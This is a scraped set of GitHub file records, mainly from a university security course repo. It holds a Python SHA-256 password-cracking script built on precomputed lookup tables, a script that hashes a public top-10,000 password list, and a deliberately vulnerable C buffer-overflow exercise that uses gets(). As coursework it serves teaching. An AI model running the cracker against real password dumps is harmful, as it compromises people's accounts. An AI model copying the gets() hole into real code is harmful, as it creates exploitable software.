"is_vendor": false,
"language": "Markdown",
"length_bytes": 864,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 15,
"path": "/README.md",
"repo_name": "ravvas/Pyelastic",
"src_encoding": "UTF-8",
"text": "# Pyelastic\nThis Respository is meant for frequently used Utility functions created while working on an ELK Project.\nThese are very simple code with as much documentation added for users to fork it and customize for their use. \n\n1) Fetch all fields names across all indices documents of an ElasticSearch Cluster. \n\n Fetch Mappings for all indices. \n Extract the field names across all indices from mappings document \n For each field check if the field exist in elastic search \n Output into an CSV file with Index Name, Field Name and Type. \n\n2) Get the number of documents available in each type across all indices. \n3) Get all the documents which don't have a specific string/sentence in a field. \n4) Read document from an index/type/id, replace few \"variable\" fields in the json with values and insert that document into another index/type/id. \n5) \n \n"
}
] | 2 |
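Item 2 in the Pyelastic README corresponds to the `elastictypecount.py` entry above: walk the mappings returned by the cluster and report per index and type. A minimal sketch of just the dictionary traversal, run against a canned payload so it stays self-contained — the payload shape mirrors what `indices.get_mapping()` returns in the pre-7.x clients this script targets, and the sample index/type names are made up:

```python
# Shape returned by es.indices.get_mapping() on pre-7.x clusters (sample data).
mappings = {
    "logs-2016": {"mappings": {"syslog": {}, "access": {}}},
    "metrics": {"mappings": {"cpu": {}}},
}

def index_type_pairs(mappings):
    # Yield (index, doc_type) for every type in every index.
    for index, body in mappings.items():
        for doc_type in body["mappings"]:
            yield index, doc_type

for index, doc_type in index_type_pairs(mappings):
    print(index + "," + doc_type)
```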
pmccabe5/CSCI345 | https://github.com/pmccabe5/CSCI345 | 1194f4181cd3365ac7283f240a93c6ea3286fb6f | a93814674892b5c789a33c8cf8fa920390fb977a | a112c71efb188fde5dd1f870aba4b3ab1eb61319 | refs/heads/master | 2022-04-18T06:51:15.867624 | 2020-04-02T03:40:28 | 2020-04-02T03:40:28 | 233,885,693 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5366795659065247,
"alphanum_fraction": 0.5755102038383484,
"avg_line_length": 41.69230651855469,
"blob_id": "caa38ccb48c0cc8771fd30ecf709ffce9506bcee",
"content_id": "06e339a7ff620e4dd7e0f707559ce7c29d50cdbd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 27195,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 637,
"path": "/Clever_McCabe_HW1/Clever_McCabe_passwd_cracking.py",
"repo_name": "pmccabe5/CSCI345",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#Clever, Clare & McCabe, Patrick\n#HW1, Spring 2020\n\n# libraries needed for execution: hashlib, threading, and termcolor (for aesthetic purpose)\nimport hashlib\nfrom threading import *\nfrom termcolor import colored\n\n# dictionaries for rules one, two, and three\nruleOneDictionary = {}\nruleTwoDictionary = {}\nruleThreeDictionary = {}\n\n# individual dictionaries for rule four based on length of the password before hashing\nruleFourDictionary1to3 = {}\nruleFourDictionary4 = {}\nruleFourDictionary5 = {}\nruleFourDictionary6 = {}\nruleFourDictionary7_0 = {}\nruleFourDictionary7_1 = {}\nruleFourDictionary7_2 = {}\nruleFourDictionary7_3 = {}\nruleFourDictionary7_4 = {}\nruleFourDictionary7_5 = {}\nruleFourDictionary7_6 = {}\nruleFourDictionary7_7 = {}\nruleFourDictionary7_8 = {}\nruleFourDictionary7_9 = {}\n\n# dictionary specifically for rule five\nruleFiveDictionary = {}\n\n# booleans to keep track of whether or not the hash tables are done generating\nwaitUntilDoneBuilding = [True, True, True, True, True, True, True, True, \nTrue, True, True, True, True, True, True]\n\n# symbols that are included in rule four\nsymbols = [\"*\", \"~\", \"!\", \"#\"]\n\npasswordHashes = []\n\n# files needed for the operation of the program\nwordlist = open('words.txt', 'r')\npasswordDump = open('passwordDump.txt', 'r')\noutfile = open('cracked-passwords-Clever-McCabe.txt', 'w')\npasswordsCracked = 0\n\n'''\nThis method generates the hashed passords in the form of \na hash table, usng the dictionary data type for rules one, \nthree, and five. These rules are generated at the same time\ndue to the word file, /usr/share/dict/words, being open and being used\nin all three of the rules. \n'''\n\ndef ruleOneAndThreeAndFivePasswords():\n\n # iterates through /usr/share/dict/words\n for line in wordlist:\n\n # fulltext is an alias for line so it can be used without capitalization\n # or a number added on for rule one. fulltext is used for both rules three \n # and five. New line character is stripped with the .strip('\\n')\n\n fulltext = line.strip('\\n')\n\n # rule5Sha256 is the process of hashing fulltext before insertion into\n # the hash table\n rule5Sha256 = hashlib.sha256()\n rule5Sha256.update(fulltext.encode())\n rule5Sha256 = rule5Sha256.hexdigest()\n ruleFiveDictionary[rule5Sha256] = fulltext \n if len(fulltext) == 7:\n\n # line is taken from the general file iterator and is only used for rule \n # three due to the capitalization and number appending to satisfy rule one\n line = line.capitalize()\n line = line.strip('\\n')\n\n # appending of single digit to line before hashing and storage \n # into the dictionary\n for count in range(10):\n temp = line.strip('\\n')\n temp = temp + str(count)\n sha256 = hashlib.sha256()\n sha256.update(temp.encode())\n sha256 = sha256.hexdigest()\n ruleOneDictionary[sha256] = temp\n\n # if statement used to satisfy rule three. 
fulltext is used in order to have \n # a clean input for the SHA256 hashing and replacement of 'a' to '@' as well\n # as 'l' to '1' \n elif len(fulltext) == 5 and (('a' in fulltext) or (('l' in fulltext))):\n fulltext = fulltext.replace('a', '@')\n fulltext = fulltext.replace('l', '1')\n rule3Sha256 = hashlib.sha256()\n rule3Sha256.update(fulltext.encode())\n rule3Sha256 = rule3Sha256.hexdigest()\n ruleThreeDictionary[rule3Sha256] = fulltext\n print(colored('DONE: Rule One, Three and Five hash tables created', 'blue'))\n waitUntilDoneBuilding[3] = False\n \n'''\nThis method generates the hashes for rules two and four, as they are \nnumeric based passwords up to four digits in length. \nRule two specifies the location of a special character\ndefined as one of the following characters [\"*\", \"~\", \"!\", \"#\"] and a number of\nfour digits in length. Rule four generates passwords of numbers up to seven\ndigits in length without any special characters added. Also, the generation of \nhashes is split up into smaller functions of varying length to improve on the\nefficiency of the program.\n'''\n\ndef ruleTwoAndRuleFourLength4():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(4):\n word = symbols[e] + str(a) + str(b) + str(c) + str(d)\n rule2Sha256 = hashlib.sha256()\n rule2Sha256.update(word.encode())\n rule2Sha256 = rule2Sha256.hexdigest()\n ruleTwoDictionary[rule2Sha256] = word\n number = str(a) + str(b) + str(c) + str(d)\n rule4For4Sha256 = hashlib.sha256()\n rule4For4Sha256.update(number.encode())\n rule4For4Sha256 = rule4For4Sha256.hexdigest()\n ruleFourDictionary4[rule4For4Sha256] = number\n print(colored('DONE: Rule Two hash table created', 'blue'))\n waitUntilDoneBuilding[4] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes from one to 3 digits in length for rule four, \nwithout any of the special characters from rule two.\n'''\n\ndef ruleFourLength1to3():\n for a in range(10):\n number = str(a)\n rule4For1to3Sha256 = hashlib.sha256()\n rule4For1to3Sha256.update(number.encode())\n rule4For1to3Sha256 = rule4For1to3Sha256.hexdigest()\n ruleFourDictionary1to3[rule4For1to3Sha256] = number\n for a in range(10):\n for b in range(10):\n number = str(a) + str(b)\n rule4For1to3Sha256 = hashlib.sha256()\n rule4For1to3Sha256.update(number.encode())\n rule4For1to3Sha256 = rule4For1to3Sha256.hexdigest()\n ruleFourDictionary1to3[rule4For1to3Sha256] = number\n for a in range(10):\n for b in range(10):\n for c in range(10):\n number = str(a) + str(b) + str(c)\n rule4For1to3Sha256 = hashlib.sha256()\n rule4For1to3Sha256.update(number.encode())\n rule4For1to3Sha256 = rule4For1to3Sha256.hexdigest()\n ruleFourDictionary1to3[rule4For1to3Sha256] = number\n waitUntilDoneBuilding[5] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length five for rule four, \nwithout any of the special characters from rule two.\n'''\n\ndef ruleFourLength5():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e)\n rule4For5Sha256 = hashlib.sha256()\n rule4For5Sha256.update(number.encode())\n rule4For5Sha256 = rule4For5Sha256.hexdigest()\n ruleFourDictionary5[rule4For5Sha256] = number\n waitUntilDoneBuilding[2] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of 
the special characters from rule two.\nThe method also lets the user see the current status of the\nlist generation. This method also prints out updates for the user\nin order to see where the program is currently.\n=======\n\n'''\n\ndef ruleFourLength6andLength7Start0():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f)\n rule4For6Sha256 = hashlib.sha256()\n rule4For6Sha256.update(number.encode())\n rule4For6Sha256 = rule4For6Sha256.hexdigest()\n ruleFourDictionary6[rule4For6Sha256] = number\n\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(0)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_0[rule4For7Sha256] = number\n\n if(number == '1000000'):\n print(colored(\"Current Status:\", 'magenta'))\n print(colored(\"8,999,999 Left . . .\", 'magenta'))\n elif(number == '2000000'):\n print(colored(\"7,999,999 Left . . .\", 'magenta'))\n elif(number == '3000000'):\n print(colored(\"6,999,999 Left . . .\", 'magenta'))\n elif(number == '4000000'):\n print(colored(\"5,999,999 Left . . .\", 'magenta'))\n elif(number == '5000000'):\n print(colored(\"4,999,999 Left . . .\", 'magenta'))\n elif(number == '6000000'):\n print(colored(\"3,999,999 Left . . .\", 'magenta'))\n elif(number == '7000000'):\n print(colored(\"2,999,999 Left . . .\", 'magenta'))\n elif(number == '8000000'):\n print(colored(\"1,999,999 Left . . .\", 'magenta'))\n elif(number == '9000000'):\n print(colored(\"999,999 Left . . .\", 'magenta'))\n waitUntilDoneBuilding[1] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two.\n'''\n\ndef ruleFourLength7Start1():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(1)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_1[rule4For7Sha256] = number\n waitUntilDoneBuilding[0] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. \nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start2():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(2)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_2[rule4For7Sha256] = number\n waitUntilDoneBuilding[6] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. 
\nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start3():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(3)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_3[rule4For7Sha256] = number\n waitUntilDoneBuilding[7] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. \nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start4():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(4)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_4[rule4For7Sha256] = number\n waitUntilDoneBuilding[8] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. \nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start5():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(5)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_5[rule4For7Sha256] = number\n waitUntilDoneBuilding[9] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. \nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start6():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(6)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_6[rule4For7Sha256] = number\n waitUntilDoneBuilding[10] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. \nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start7():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(7)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_7[rule4For7Sha256] = number\n waitUntilDoneBuilding[11] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. 
\nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start8():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(8)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_8[rule4For7Sha256] = number\n waitUntilDoneBuilding[12] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. \nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start9():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(9)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_9[rule4For7Sha256] = number\n waitUntilDoneBuilding[13] = False\n\ndef readInPasswords():\n for line in passwordDump.readlines():\n password = line.split(':')[1].strip('\\n')\n passwordHashes.append(password)\n waitUntilDoneBuilding[14] = False\n print(colored('DONE: All password hashes have been read into an array', 'blue'))\n\n'''\nMain method is designed to initiate all the threads for the program as well as read in the passwords from \nthe specified hash file in the README. The other functionality of the main method is to compare the hashes\nthat have been loaded into the program to the hashes stored in the hashtables.\n''' \n\n\ndef main():\n print(colored('The program will begin by creating all the threads to build the hash table rule sets.', 'yellow'))\n\n threadZero = Thread(target = ruleFourLength7Start1)\n threadZero.start()\n\n threadSix = Thread(target = ruleFourLength7Start2)\n threadSix.start()\n\n threadSeven = Thread(target = ruleFourLength7Start3)\n threadSeven.start()\n\n threadEight = Thread(target = ruleFourLength7Start4)\n threadEight.start()\n\n threadNine = Thread(target = ruleFourLength7Start5)\n threadNine.start()\n\n threadTen = Thread(target = ruleFourLength7Start6)\n threadTen.start()\n\n threadEleven = Thread(target = ruleFourLength7Start7)\n threadEleven.start()\n\n threadTwelve = Thread(target = ruleFourLength7Start8)\n threadTwelve.start()\n\n threadThirteen = Thread(target = ruleFourLength7Start9)\n threadThirteen.start()\n\n threadOne = Thread(target = ruleFourLength6andLength7Start0)\n threadOne.start()\n\n threadTwo = Thread(target = ruleFourLength5)\n threadTwo.start()\n\n threadThree = Thread(target = ruleOneAndThreeAndFivePasswords)\n threadThree.start()\n\n threadFour = Thread(target = ruleTwoAndRuleFourLength4)\n threadFour.start()\n\n threadFive = Thread(target = ruleFourLength1to3)\n threadFive.start()\n\n threadFourteen = Thread(target = readInPasswords)\n threadFourteen.start()\n\n print(colored('DONE: All threads have been created', 'blue'))\n\n print(colored('Please wait. . . 
The program is currently generating the hash table rule sets.', 'yellow'))\n print(colored('Periodic updates will be given along the way displaying the programs progress.', 'yellow'))\n \n while(waitUntilDoneBuilding[0] == True or waitUntilDoneBuilding[1] == True or waitUntilDoneBuilding[2] == True \n or waitUntilDoneBuilding[3] == True or waitUntilDoneBuilding[4] == True \n or waitUntilDoneBuilding[5] == True or waitUntilDoneBuilding[6] == True or waitUntilDoneBuilding[7] == True \n or waitUntilDoneBuilding[8] == True or waitUntilDoneBuilding[9] == True or waitUntilDoneBuilding[10] == True\n or waitUntilDoneBuilding[11] == True or waitUntilDoneBuilding[12] == True or waitUntilDoneBuilding[13] == True\n or waitUntilDoneBuilding[14] == True):\n spin = True\n \n print(colored('DONE: All hash table rule sets have been created', 'blue'))\n\n for hashedPassword in passwordHashes:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleOneDictionary[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleOneDictionary[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleTwoDictionary[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleTwoDictionary[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleThreeDictionary[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleThreeDictionary[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary1to3[hashedPassword]), 'green')\n outfile.write(hashedPassword + ':' + ruleFourDictionary1to3[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary1to3[hashedPassword],'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary1to3[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary4[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary4[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary5[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary5[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary6[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary6[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try: \n print(colored(hashedPassword + ':' + ruleFourDictionary7_0[hashedPassword],'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_0[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_1[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_1[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_2[hashedPassword], 
'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_2[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_3[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_3[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_4[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_4[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_5[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_5[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_6[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_6[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_7[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_7[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_8[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_8[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_9[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_9[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFiveDictionary[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFiveDictionary[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n print(colored('Hash not found . . . ' + hashedPassword, 'red'))\n \nmain()\n"
},
{
"alpha_fraction": 0.7377049326896667,
"alphanum_fraction": 0.7632058262825012,
"avg_line_length": 90.43333435058594,
"blob_id": "722cc755a7ff373fb4978f4736a56fa1585785e6",
"content_id": "8a4234a02f060624d4761fa82fee177622059eb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2745,
"license_type": "no_license",
"max_line_length": 662,
"num_lines": 30,
"path": "/Clever_McCabe_HW1/README.md",
"repo_name": "pmccabe5/CSCI345",
"src_encoding": "UTF-8",
"text": "# CSCI345 HW 1\n## Running the program\n#### Written by: Clare Clever and Patrick McCabe\n#### In order for maximum viewing experience, using VSCode's README preview function or another Markdown Viewer\n## How to run HW1\n1. Make sure python3 is installed in your environment.\n2. Open a terminal and navigate to the folder containing `Clever_McCabe_HW1_passwd_cracking.py`\n3. Run the following commands in a terminal:\n * `pip3 install termcolor`\n * `python3 Clever_McCabe_HW1_passwd_cracking.py`\n\n## Test Cases\nWe initially used 18 test cases, three for each rule along with a mix of other types of hashesto test. We then pulled the top 10,000 passwords from [Daniel Miessler's xato-net-10-million-passwords-10000](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-10000.txt) list and was hashed to the specified format for input into the program: `username:hash[:otherstuff]`. These tests were then combined with our original test cases to create our full test suite. Included are our hash creation script for testing, `hash.py`, as well as the plain text of Daniel Miessler's top 10,000 list, `Daniel-Miessler-Top10000.txt`. \n## Input and Output\nThe input file is called `passwordDump.txt` (formatted to username:encryption[:otherstuff]) with one input per line, any additional test cases can be inserted into the file for further testing. We have included the default wordlist for Unix as `words.txt` for platform compatibility. \nThe output file is `cracked-passwords-Clever-McCabe.txt`\n\n## Performance\n* Potential password hashes are loaded into a hash table at the beginning of the program. This is the most expensive part of our program due to the time it takes to generate the hashes \nthat satisfy all the rules, as well as the memory needed to load the hashes into memory.\n* The overall runtime of the program is improved upon by using the included threadding library included in python to mulithread the generation of the hashes at runtime.\n* Comparison of the hash that is input into the program is almost instataneous, due to the hash table allowing for instant access of the records with the hash as the key\n* **Note: This program benefits from newer hardware such as multithreadded processors and more available RAM. We conducted our tests on a desktop with a quad core Intel i5 4th generation processor with 8GB of double data rate (DDR) DDR3 RAM, a MacBook Pro with a dual core Intel i5 chip and 16GB of DDR3 RAM, and a AMD Ryzen 2700x with 4 cores, 8 CPU threads, and 12GB of DDR4 RAM**\n* **`(JOKE) Hardware Specifications:`**\n\n| Hardware | Minimum | Optimal |\n|:----------:|:---------:|:---------:|\n|CPU | 4x Core | 6+ Cores|\n|RAM|8 GB |32+ GB|\n|GPU | Integrated Graphics | Nvidia RTX 2080 |\n\n\n"
},
{
"alpha_fraction": 0.6629629731178284,
"alphanum_fraction": 0.6777777671813965,
"avg_line_length": 18.35714340209961,
"blob_id": "98f0bb1e3008753e5d57c80e4b1f4e56c34d54c2",
"content_id": "d639d6be5db960ffe3a07750aa247d8f5f250e3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 270,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 14,
"path": "/HW4/bo1.c",
"repo_name": "pmccabe5/CSCI345",
"src_encoding": "UTF-8",
"text": "#include <stdlib.h>\n#include <unistd.h>\n#include <stdio.h>\nint main(int argc, char **argv)\n{\nvolatile int modified;\nchar buffer[64];\nmodified = 0;\ngets(buffer);\nif(modified != 0) {printf(\"you have changed the 'modified' variable\\n\");\n} else {\nprintf(\"Try again?\\n\");\n}\n}"
},
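The `bo1.c` entry above is a deliberately vulnerable exercise: `gets` writes past the 64-byte `buffer` and can clobber the adjacent `modified` variable. A minimal sketch of generating an overflowing input in Python — the 64-byte figure comes from the source, but the exact padding needed to reach `modified` depends on stack layout and compiler, so treat the padding count as an assumption to tune:

```python
import sys

BUFFER_SIZE = 64   # from `char buffer[64]` in bo1.c
PADDING = 8        # assumed extra bytes to reach `modified`; adjust per binary

# Write more than sizeof(buffer) bytes so gets() overruns into `modified`.
sys.stdout.buffer.write(b"A" * (BUFFER_SIZE + PADDING) + b"\n")
```

For this style of exercise the target is typically compiled with stack protection disabled (e.g. gcc's `-fno-stack-protector`) and the payload piped in, e.g. `python3 payload.py | ./bo1`.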
{
"alpha_fraction": 0.5690608024597168,
"alphanum_fraction": 0.5966851115226746,
"avg_line_length": 23.200000762939453,
"blob_id": "7fd733767ec64e8b7fcfe41e391b1df90f746523",
"content_id": "c82f5edcb335eb7a52cc27afe1479eb70e719b41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 362,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 15,
"path": "/Clever_McCabe_HW1/hash.py",
"repo_name": "pmccabe5/CSCI345",
"src_encoding": "UTF-8",
"text": "import hashlib\n\nwordlist = open('DanielMiessler-Top10000.txt', 'r')\n\noutfile = open('outFile.txt', 'w')\ni = 0\n\nfor line in wordlist:\n fulltext = line.strip('\\n')\n hashed = hashlib.sha256()\n hashed.update(fulltext.encode())\n hashed = hashed.hexdigest()\n outfile.write(\"Test\" + str(i) + \":\" + hashed + \":\" + str(i) + \"\\n\")\n print(i)\n i = i + 1"
},
{
"alpha_fraction": 0.755892276763916,
"alphanum_fraction": 0.7760942578315735,
"avg_line_length": 53,
"blob_id": "190e1b34c721b2b58c9643049746eb3a7fac2af1",
"content_id": "22f6d534aa8f43260318ea3c3b131a86b90c764f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 594,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 11,
"path": "/README.md",
"repo_name": "pmccabe5/CSCI345",
"src_encoding": "UTF-8",
"text": "# CSCI345\n## Running the program\n**How to run HW1**\n1. Make sure Python3 is installed in your environment.\n2. Open a terminal and navigate to the folder containing `Clever_McCabe_HW1_passwd_cracking.py`\n3. Run the following commands in the terminal:\n * pip3 install termcolor\n * python3 Clever_McCabe_HW1_passwd_cracking.py\n## Input and Output\nThe input file is `passwordDump.txt` (formatted to username:encryption[:otherstuff]) with one input per line, any additional test cases can be inserted into the file for further testing.\nThe output file is `cracked-passwords-Clever-McCabe.txt`\n"
}
] | 5 |
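The homework code above builds large SHA-256 lookup tables and then probes them with each dumped hash, so every lookup is O(1) instead of re-hashing the wordlist per target. The core idea in isolation, as a self-contained sketch — the `username:hash[:otherstuff]` line format is from the README, while the toy passwords are made up:

```python
import hashlib

candidates = ["password", "letmein", "hunter2"]  # toy wordlist

# Precompute a hash table mapping sha256(candidate) -> candidate.
table = {hashlib.sha256(c.encode()).hexdigest(): c for c in candidates}

dump_line = "alice:" + hashlib.sha256(b"hunter2").hexdigest() + ":1001"
hashed = dump_line.split(":")[1]

# One dictionary lookup per target hash.
print(table.get(hashed, "<not cracked>"))
```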
ryanrabello/power-analyzer-backend | https://github.com/ryanrabello/power-analyzer-backend | b319dc3a2a906d7a701215a9be5e1c628d19289d | 0cc2b17da1de3b79d1fb1a843ea027f1afbbb0a8 | 208f9d15211d2c33c0b3fe34e586f953052190a9 | refs/heads/master | 2022-01-02T08:06:38.725581 | 2018-02-05T22:58:54 | 2018-02-05T22:58:54 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6900368928909302,
